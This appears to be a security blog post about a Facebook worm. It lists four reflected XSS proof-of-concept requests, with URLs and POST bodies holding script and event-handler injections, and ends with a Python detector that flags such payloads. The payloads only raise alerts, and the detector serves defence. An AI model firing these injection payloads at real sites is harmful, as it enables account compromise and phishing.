
Critical Facebook XSS

A Facebook worm, aka “Koobface”, is exploiting a highly critical XSS vulnerability, as recently discovered. It seems these guys have been successfully messing around in Facebook, as the worm has been around for months now.

Further reading: xssed.com

XSS #1 with POST (by Zeitjak)

http://www.new.facebook.com/r.php

POST: reg_email__="onmouseover="alert('XSS – ZJ')"foo="bar

XSS #2 with POST (by David Wharton)

https://login.facebook.com/login.php?iphone&next=http%3A%2F%2Fiphone.facebook.com%2F

POST: 

email=biz%22%3E%3Cscript%3Ealert%28%27tohellwithgeorgia%27%29%3C%2Fscript%3E%3C%22&pass=greetz2evilghost&next=http%3A%2F%2Fiphone.facebook.com%2F&login=Login

XSS #3 (by DaiMon)

http://apps.facebook.com/blognetworks/searchpage.php?tag=%22%3E%3Cscript%3Ealert(%22DaiMon%22)%3C/script%3E

This one is served from another IP (67.228.87.82) and can’t be used for a worm, only for phishing.

XSS #4 with POST (by p3lo)

http://developers.facebook.com/tools.php?fbml

POST: 

profile=1299125444&position=wide&api_key=%27%22%3E%3C%2Ftitle%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EXSS+by+p3lo%3C%2Fh1%3E%3C%2Fmarquee%3E+&fbml=

–>> Hmm, a nice set of PoCs to play around with.
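All four PoCs above share the same shape: a request parameter that is reflected into the page and breaks out of its context (an attribute value, the `<title>` element, or the document body) with `"><script>`, `</title><script>` or a stray `onmouseover=` handler. The following detector, an added example that is not part of the original post, shows how a log reviewer or WAF rule would catch that shape: it decodes each parameter the way a browser-facing server would and flags context breakouts. The request records are constructed from the payloads on this page, and all parameter names, URLs and rule names are taken from the page or are assumptions for this example.

```python
import html
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed request records modelled on the PoCs above (not real log data);
# the last one is a benign search so the detector has a negative case.
SAMPLE_REQUESTS = [
    ("POST", "http://www.new.facebook.com/r.php",
     "reg_email__=\"onmouseover=\"alert('XSS')\"foo=\"bar"),
    ("POST", "https://login.facebook.com/login.php?iphone&next=http%3A%2F%2Fiphone.facebook.com%2F",
     "email=biz%22%3E%3Cscript%3Ealert%28%27x%27%29%3C%2Fscript%3E%3C%22&pass=secret&login=Login"),
    ("GET", "http://apps.facebook.com/blognetworks/searchpage.php?tag=%22%3E%3Cscript%3Ealert(%22DaiMon%22)%3C/script%3E", ""),
    ("POST", "http://developers.facebook.com/tools.php?fbml",
     "profile=1299125444&position=wide&api_key=%27%22%3E%3C%2Ftitle%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EXSS+by+p3lo%3C%2Fh1%3E%3C%2Fmarquee%3E+&fbml="),
    ("GET", "http://apps.facebook.com/blognetworks/searchpage.php?tag=security+news", ""),
]

# Each rule names the reflection context the PoCs break out of.
RULES = [
    ("script tag", re.compile(r"<\s*/?\s*script\b", re.I)),
    ("title breakout", re.compile(r"<\s*/\s*title\b", re.I)),
    ("event handler attribute", re.compile(r"""["'\s]on[a-z]+\s*=""", re.I)),
    ("attribute/tag breakout", re.compile(r"""["']\s*>\s*<""")),
]

def normalize(value, rounds=2):
    """Undo percent- and entity-encoding (twice, to catch double encoding).
    Over-decoding a legitimate value only makes the detector more sensitive."""
    for _ in range(rounds):
        value = html.unescape(unquote_plus(value))
    return value

def request_params(method, url, body):
    """Collect (name, value) pairs from the query string and, for POST, the body."""
    pairs = parse_qsl(urlsplit(url).query, keep_blank_values=True)
    if method == "POST":
        pairs += parse_qsl(body, keep_blank_values=True)
    return pairs

def scan_request(method, url, body):
    """Return (param_name, rule_name) for every parameter that trips a rule."""
    findings = []
    for name, raw in request_params(method, url, body):
        value = normalize(raw)
        for label, pattern in RULES:
            if pattern.search(value):
                findings.append((name, label))
    return findings

def scan_all(requests=SAMPLE_REQUESTS):
    return [scan_request(*record) for record in requests]
```

The decoded parameter, not the raw log line, is what gets matched; matching the raw `%3C%2Fscript%3E` form would miss the same payload sent as `</script>`, `&lt;/script&gt;` or double-encoded.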
